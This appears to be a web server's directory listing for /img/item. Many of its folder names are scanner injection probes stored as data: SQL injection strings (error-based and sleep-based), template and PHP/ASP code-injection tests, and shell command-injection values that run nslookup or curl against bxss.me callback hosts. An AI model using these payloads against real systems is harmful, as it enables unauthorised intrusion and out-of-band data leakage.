Index of /img/item

• Parent Directory
• !(()&&!|*|*|/
• "%>dfb<%=98991*97996%>xca/
• "%}dfb{{98991*97996}}xca/
• ")dfb@(98991*97996)xca/
• "+"A".concat(70-3).concat(22*4).concat(116).concat(68).concat(102).concat(71)+(require"socket" Socket.gethostbyname("hitvu"+"ekhkivhbc9e47.bxss.me.")[3].to_s)+"/
• "+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(118),CHAR(97),CHAR(117),CHAR(120),CHAR(115),CHAR(119),CHAR(113),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"/
• "+(select CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(118),CHAR(97),CHAR(117),CHAR(120),CHAR(115),CHAR(119),CHAR(113))+"/
• "+EXTRACTVALUE(1,CONCAT(0x3a,CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(118),CHAR(97),CHAR(117),CHAR(120),CHAR(115),CHAR(119),CHAR(113)))+"/
• "+response.write(9134631*9088989)+"/
• ".gethostbyname(lc("hitwn"."jcubnlftc9d6d.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(70).chr(106).chr(79)."/
• "98991*97996*98991*97996/
• ";print(md5(31337));$a="/
• "dfb__${98991*97996}__::.x/
• "print("dfb" . 98991*97996 . "xca");/
• "}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")/
• "}#{98991*97996*98991*97996}/
• "}dfb#set($x=98991*97996)${x}xca/
• "}dfb#{98991*97996}xca/
• "}dfb#{xca}=123/
• "}dfb${98991*97996}xca/
• "}dfb[[${98991*97996}]]xca/
• "}dfb{#98991*97996}xca/
• "}dfb{98991*97996}xca/
• "}dfb{@98991*97996}xca/
• "}dfb{{"abc"|title}}xca/
• "}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA/
• "}}dfb{{98991*97996}}xca/
• "}}dfb{{=98991*97996}}xca/
• "}}}dfb{{{this}}}xca/
• $(nslookup -q=cname hiteflhajsvew863d6.bxss.me||curl hiteflhajsvew863d6.bxss.me)/
• ${9999374+10000333}/
• ${@print(md5(31337))}/
• (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(118),CHAR(97),CHAR(117),CHAR(120),CHAR(115),CHAR(119),CHAR(113),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)/
• (nslookup -q=cname hitexbkewhkyv5292a.bxss.me||curl hitexbkewhkyv5292a.bxss.me))/
• (select CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(118),CHAR(97),CHAR(117),CHAR(120),CHAR(115),CHAR(119),CHAR(113))/
• )/
• -1 OR 5*5=25 -- /
• -1 OR 5*5=25/
• -1" OR 5*5=25 -- /
• -1" OR 5*5=25 or "QztOurKh"="/
• -1' OR 5*5=25 -- /
• -1' OR 5*5=25 or 'CnuDnC7h'='/
• 1%>dfb<%=98991*97996%>xca/
• 1%}dfb{{98991*97996}}xca/
• 1)dfb@(98991*97996)xca/
• 10/
• 100/
• 101/
• 102/
• 103/
• 104/
• 105/
• 106/
• 107/
• 108/
• 109/
• 11/
• 110/
• 111/
• 112/
• 113/
• 114/
• 115/
• 116/
• 12/
• 13/
• 14/
• 15/
• 16/
• 17/
• 18/
• 19/
• 198991*97996*98991*97996/
• 1LRFBFOH8RR0/
• 1dfb__${98991*97996}__::.x/
• 1print("dfb" . 98991*97996 . "xca");/
• 1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")/
• 1}#{98991*97996*98991*97996}/
• 1}dfb#set($x=98991*97996)${x}xca/
• 1}dfb#{98991*97996}xca/
• 1}dfb#{xca}=123/
• 1}dfb${98991*97996}xca/
• 1}dfb[[${98991*97996}]]xca/
• 1}dfb{#98991*97996}xca/
• 1}dfb{98991*97996}xca/
• 1}dfb{@98991*97996}xca/
• 1}dfb{{"abc"|title}}xca/
• 1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA/
• 1}}dfb{{98991*97996}}xca/
• 1}}dfb{{=98991*97996}}xca/
• 1}}}dfb{{{this}}}xca/
• 20/
• 21/
• 22/
• 23/
• 24/
• 25/
• 26/
• 27/
• 28/
• 29/
• 3"&&sleep(27*1000)*izshdz&&"/
• 3"||sleep(27*1000)*wlbkby||"/
• 3*if(now()=sysdate(),sleep(15),0)/
• 3/
• 30'XOR(3*if(now()=sysdate(),sleep(0),0))XOR'Z/
• 30'XOR(3*if(now()=sysdate(),sleep(15),0))XOR'Z/
• 30'XOR(3*if(now()=sysdate(),sleep(25),0))XOR'Z/
• 30'XOR(3*if(now()=sysdate(),sleep(3),0))XOR'Z/
• 30'XOR(3*if(now()=sysdate(),sleep(6),0))XOR'Z/
• 30/
• 31/
• 32/
• 33/
• 34/
• 35/
• 36/
• 37/
• 37Af2uTIM/
• 38/
• 39/
• 39870081/
• 39870081</
• 4/
• 40/
• 41/
• 42/
• 43/
• 44/
• 45/
• 46/
• 47/
• 48/
• 49/
• 5/
• 50/
• 51/
• 52/
• 53/
• 54/
• 55/
• 56/
• 57/
• 58/
• 59/
• 6/
• 60/
• 61/
• 62/
• 63/
• 64/
• 65/
• 66/
• 67/
• 68/
• 69/
• 7/
• 70/
• 71/
• 72/
• 73/
• 74/
• 75/
• 76/
• 77/
• 78/
• 79/
• 8/
• 80/
• 81/
• 82/
• 83/
• 84/
• 85/
• 86/
• 87/
• 88/
• 89/
• 9/
• 90/
• 91/
• 92/
• 93/
• 94/
• 95/
• 96/
• 97/
• 98/
• 99/
• ;(nslookup -q=cname hitapknlwdgdg2cc42.bxss.me||curl hitapknlwdgdg2cc42.bxss.me)|(nslookup -q=cname hitapknlwdgdg2cc42.bxss.me||curl hitapknlwdgdg2cc42.bxss.me)&(nslookup -q=cname hitapknlwdgdg2cc42.bxss.me||curl hitapknlwdgdg2cc42.bxss.me)/
• <!--/
• <%={{={@{#{${dfb}}%>/
• <?php print(md5(31337));?>/
• <th:t="${dfb}#foreach/
• Array/
• EXTRACTVALUE(1,CONCAT(0x3a,CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(118),CHAR(97),CHAR(117),CHAR(120),CHAR(115),CHAR(119),CHAR(113)))/
• ^(#$!@#$)(()))******/
• `(nslookup -q=cname hitgsbkagegyk20f3b.bxss.me||curl hitgsbkagegyk20f3b.bxss.me)`/
• bfg4696＜s1﹥s2ʺs3ʹhjl4696/
• bfgx1491��z1��z2a�bcxhjl1491/
• bxss.me/
• expr 9000607553 - 922461/
• img/
• img_sum/
• item_edit.php/
• item_imglist.inc
• item_listset.inc
• item_rowcoment.inc
• print(md5(31337));/
• redirtest.acx/
• response.write(9134631*9088989)/
• sum/
• text/
• {{7228*7228}}/
• |(nslookup -q=cname hitolvydpcezmde6da.bxss.me||curl hitolvydpcezmde6da.bxss.me)/
• |(nslookup${IFS}-q${IFS}cname${IFS}hitncimcgltuafb359.bxss.me||curl${IFS}hitncimcgltuafb359.bxss.me)/